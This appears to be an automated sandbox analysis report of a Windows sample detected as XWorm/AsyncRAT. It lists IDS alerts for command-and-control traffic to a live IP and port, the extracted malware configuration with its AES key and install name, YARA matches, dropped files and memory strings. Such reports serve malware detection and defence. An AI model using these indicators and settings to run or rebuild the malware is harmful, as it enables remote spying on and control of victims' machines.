                      2024-11-29T15:21:05.270211+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:05.372291+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:05.492173+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:05.854165+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:05.975522+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:06.029420+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:06.149596+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:06.269661+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:06.389848+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:06.510254+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:06.630516+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:06.712689+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:06.832827+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:06.952909+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:07.073227+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:07.193395+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:07.313717+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:07.420599+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      2024-11-29T15:21:07.540909+010028528731Malware Command and Control Activity Detected192.168.2.649986103.230.121.1247000TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-29T15:20:23.932978+010028559241Malware Command and Control Activity Detected192.168.2.649884103.230.121.1247000TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-29T15:20:59.340612+010028531911Malware Command and Control Activity Detected103.230.121.1247000192.168.2.649884TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-29T15:20:58.593385+010028531921Malware Command and Control Activity Detected192.168.2.649884103.230.121.1247000TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: file.exeAvira: detected
                      Source: C:\Users\user\AppData\Roaming\java.exeAvira: detection malicious, Label: TR/Spy.Gen
                      Source: file.exeMalware Configuration Extractor: Xworm {"C2 url": ["103.230.121.124"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
                      Source: C:\Users\user\AppData\Roaming\java.exeReversingLabs: Detection: 81%
                      Source: file.exeReversingLabs: Detection: 81%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Roaming\java.exeJoe Sandbox ML: detected
                      Source: file.exeJoe Sandbox ML: detected
                      Source: file.exeString decryptor: 103.230.121.124
                      Source: file.exeString decryptor: 7000
                      Source: file.exeString decryptor: <123456789>
                      Source: file.exeString decryptor: <Xwormmm>
                      Source: file.exeString decryptor: java
                      Source: file.exeString decryptor: USB.exe
                      Source: file.exeString decryptor: %AppData%
                      Source: file.exeString decryptor: java.exe
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 00007FFD34824E27h0_2_00007FFD34824605
                      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 00007FFD34824E27h0_2_00007FFD34824605
                      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 00007FFD34823002h0_2_00007FFD34822E6C
                      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 00007FFD348241E4h0_2_00007FFD3481F6A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 00007FFD348241F5h0_2_00007FFD3481F6A0

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49884 -> 103.230.121.124:7000
                      Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 103.230.121.124:7000 -> 192.168.2.6:49884
                      Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49884 -> 103.230.121.124:7000
                      Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 103.230.121.124:7000 -> 192.168.2.6:49884
                      Source: Network trafficSuricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.6:49986 -> 103.230.121.124:7000
                      Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49986 -> 103.230.121.124:7000
                      Source: Network trafficSuricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.6:49884 -> 103.230.121.124:7000
                      Source: Network trafficSuricata IDS: 2853191 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound : 103.230.121.124:7000 -> 192.168.2.6:49884
                      Source: Malware configuration extractorURLs: 103.230.121.124
                      Source: Yara matchFile source: file.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.file.exe.630000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\java.exe, type: DROPPED
                      Source: global trafficTCP traffic: 192.168.2.6:49884 -> 103.230.121.124:7000
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                      Source: Joe Sandbox ViewASN Name: VPSQUANUS VPSQUANUS
                      Source: unknownDNS query: name: ip-api.com
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.230.121.124
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: ip-api.com
                      Source: powershell.exe, 0000000A.00000002.2565979792.00000160459C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mEk
                      Source: powershell.exe, 0000000A.00000002.2565979792.00000160459C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                      Source: powershell.exe, 0000000A.00000002.2565979792.00000160459C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                      Source: powershell.exe, 00000010.00000002.2788544473.000001AA3FCE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mwrr
                      Source: svchost.exe, 0000000C.00000002.3404757837.0000014D50A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                      Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
                      Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                      Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                      Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                      Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                      Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                      Source: edb.log.12.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: powershell.exe, 00000010.00000002.2604852851.000001AA25B77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
                      Source: powershell.exe, 00000010.00000002.2604852851.000001AA25B77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.ctain
                      Source: file.exe, java.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                      Source: powershell.exe, 00000002.00000002.2215164794.000001A95E38F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2344886418.00000283B7450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2535136139.000001603D3E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2743903646.000001AA3758E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000010.00000002.2608646388.000001AA27748000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000002.00000002.2188717626.000001A94E548000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2258347917.00000283A7608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2410917342.000001602D599000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2608646388.000001AA27748000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: file.exe, 00000000.00000002.3408817500.0000000002991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2188717626.000001A94E321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2258347917.00000283A73E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2410917342.000001602D371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2608646388.000001AA27521000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000002.00000002.2188717626.000001A94E548000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2258347917.00000283A7608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2410917342.000001602D599000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2608646388.000001AA27748000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 00000010.00000002.2608646388.000001AA27748000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 0000000A.00000002.2565979792.00000160459C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                      Source: powershell.exe, 0000000A.00000002.2565979792.00000160459C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsof.
                      Source: powershell.exe, 0000000A.00000002.2565979792.0000016045A79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                      Source: powershell.exe, 0000000A.00000002.2565979792.00000160459C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                      Source: powershell.exe, 00000002.00000002.2188717626.000001A94E321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2258347917.00000283A73E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2410917342.000001602D371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2608646388.000001AA27521000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 00000010.00000002.2743903646.000001AA3758E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000010.00000002.2743903646.000001AA3758E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000010.00000002.2743903646.000001AA3758E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: edb.log.12.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                      Source: svchost.exe, 0000000C.00000003.2419893569.0000014D507F0000.00000004.00000800.00020000.00000000.sdmp, edb.log.12.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                      Source: powershell.exe, 00000010.00000002.2608646388.000001AA27748000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000002.00000002.2215164794.000001A95E38F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2344886418.00000283B7450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2535136139.000001603D3E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2743903646.000001AA3758E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: 0.2.file.exe.ca0000.0.raw.unpack, RemoteDesktop.cs.Net Code: GetScreen
                      Source: 0.2.file.exe.2a61cd8.1.raw.unpack, RemoteDesktop.cs.Net Code: GetScreen

                      Operating System Destruction

                      barindex
                      Source: C:\Users\user\Desktop\file.exeProcess information set: 01 00 00 00 Jump to behavior

                      System Summary

                      barindex
                      Source: file.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.0.file.exe.630000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000000.00000000.2125481379.0000000000632000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000000.00000002.3414135593.00000000129A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Roaming\java.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD348194690_2_00007FFD34819469
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD348160C60_2_00007FFD348160C6
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD348246050_2_00007FFD34824605
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD34821A4A0_2_00007FFD34821A4A
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD348112F80_2_00007FFD348112F8
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD348117190_2_00007FFD34811719
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD348172720_2_00007FFD34817272
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD348113CD0_2_00007FFD348113CD
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD348120F50_2_00007FFD348120F5
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD3481108D0_2_00007FFD3481108D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34809EF32_2_00007FFD34809EF3
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3480947D2_2_00007FFD3480947D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34808E2C2_2_00007FFD34808E2C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34805EFA2_2_00007FFD34805EFA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3480AB252_2_00007FFD3480AB25
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3480B7DC2_2_00007FFD3480B7DC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD347F71FB6_2_00007FFD347F71FB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD347F5BFA6_2_00007FFD347F5BFA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD347F6FAD6_2_00007FFD347F6FAD
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD3482850310_2_00007FFD34828503
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD3482947D10_2_00007FFD3482947D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD34828E0510_2_00007FFD34828E05
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD348125ED16_2_00007FFD348125ED
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD348189F216_2_00007FFD348189F2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD348135FA16_2_00007FFD348135FA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD348171FB16_2_00007FFD348171FB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD34815BFA16_2_00007FFD34815BFA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD348E333016_2_00007FFD348E3330
                      Source: C:\Users\user\AppData\Roaming\java.exeCode function: 20_2_00007FFD348112F820_2_00007FFD348112F8
                      Source: C:\Users\user\AppData\Roaming\java.exeCode function: 20_2_00007FFD3481171920_2_00007FFD34811719
                      Source: C:\Users\user\AppData\Roaming\java.exeCode function: 20_2_00007FFD348120F520_2_00007FFD348120F5
                      Source: C:\Users\user\AppData\Roaming\java.exeCode function: 20_2_00007FFD3481103820_2_00007FFD34811038
                      Source: C:\Users\user\AppData\Roaming\java.exeCode function: 21_2_00007FFD348012F821_2_00007FFD348012F8
                      Source: C:\Users\user\AppData\Roaming\java.exeCode function: 21_2_00007FFD3480171921_2_00007FFD34801719
                      Source: C:\Users\user\AppData\Roaming\java.exeCode function: 21_2_00007FFD348020F521_2_00007FFD348020F5
                      Source: C:\Users\user\AppData\Roaming\java.exeCode function: 21_2_00007FFD3480103821_2_00007FFD34801038
                      Source: C:\Users\user\AppData\Roaming\java.exeCode function: 22_2_00007FFD347F12F822_2_00007FFD347F12F8
                      Source: C:\Users\user\AppData\Roaming\java.exeCode function: 22_2_00007FFD347F171922_2_00007FFD347F1719
                      Source: C:\Users\user\AppData\Roaming\java.exeCode function: 22_2_00007FFD347F20F522_2_00007FFD347F20F5
                      Source: C:\Users\user\AppData\Roaming\java.exeCode function: 22_2_00007FFD347F103822_2_00007FFD347F1038
                      Source: C:\Users\user\AppData\Roaming\java.exeCode function: 23_2_00007FFD348012F823_2_00007FFD348012F8
                      Source: C:\Users\user\AppData\Roaming\java.exeCode function: 23_2_00007FFD3480171923_2_00007FFD34801719
                      Source: C:\Users\user\AppData\Roaming\java.exeCode function: 23_2_00007FFD348020F523_2_00007FFD348020F5
                      Source: C:\Users\user\AppData\Roaming\java.exeCode function: 23_2_00007FFD3480103823_2_00007FFD34801038
                      Source: file.exe, 00000000.00000000.2125500166.0000000000644000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamejava.exe4 vs file.exe
                      Source: file.exe, 00000000.00000002.3407281886.0000000000CA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRemoteDesktop.dll< vs file.exe
                      Source: file.exe, 00000000.00000002.3408817500.0000000002A5A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemoteDesktop.dll< vs file.exe
                      Source: file.exe, 00000000.00000002.3414135593.00000000129A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamejava.exe4 vs file.exe
                      Source: file.exe, 00000000.00000002.3408817500.0000000002A5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemoteDesktop.dll< vs file.exe
                      Source: file.exeBinary or memory string: OriginalFilenamejava.exe4 vs file.exe
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: file.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0.0.file.exe.630000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000000.00000000.2125481379.0000000000632000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000000.00000002.3414135593.00000000129A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Roaming\java.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: file.exe, gGSik08LJTvBozHQW2rJNQsWdcNqnyZUe86p7yncuFlms6MojWQZlBOUXgyIdyiSbbkQtu.csCryptographic APIs: 'TransformFinalBlock'
                      Source: file.exe, gGSik08LJTvBozHQW2rJNQsWdcNqnyZUe86p7yncuFlms6MojWQZlBOUXgyIdyiSbbkQtu.csCryptographic APIs: 'TransformFinalBlock'
                      Source: file.exe, 775VniLT7bBOBCrgmDFH7fyve0dFdV6L3kiBaHDulpBhielIdxD38ipbQTK42LW6agwC07.csCryptographic APIs: 'TransformFinalBlock'
                      Source: java.exe.0.dr, gGSik08LJTvBozHQW2rJNQsWdcNqnyZUe86p7yncuFlms6MojWQZlBOUXgyIdyiSbbkQtu.csCryptographic APIs: 'TransformFinalBlock'
                      Source: java.exe.0.dr, gGSik08LJTvBozHQW2rJNQsWdcNqnyZUe86p7yncuFlms6MojWQZlBOUXgyIdyiSbbkQtu.csCryptographic APIs: 'TransformFinalBlock'
                      Source: java.exe.0.dr, 775VniLT7bBOBCrgmDFH7fyve0dFdV6L3kiBaHDulpBhielIdxD38ipbQTK42LW6agwC07.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.file.exe.ca0000.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.file.exe.ca0000.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.file.exe.2a61cd8.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.file.exe.2a61cd8.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: file.exe, l54gtFtLpKyOWZi2thKGa1BAbVNOqqAtAL11OEGAtZRsmPvwHpaf.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: file.exe, l54gtFtLpKyOWZi2thKGa1BAbVNOqqAtAL11OEGAtZRsmPvwHpaf.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: java.exe.0.dr, l54gtFtLpKyOWZi2thKGa1BAbVNOqqAtAL11OEGAtZRsmPvwHpaf.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: java.exe.0.dr, l54gtFtLpKyOWZi2thKGa1BAbVNOqqAtAL11OEGAtZRsmPvwHpaf.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/25@1/3
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\java.exeJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\java.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5196:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:356:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5040:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4396:120:WilError_03
                      Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\mei9G7f5idjyuPFm
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
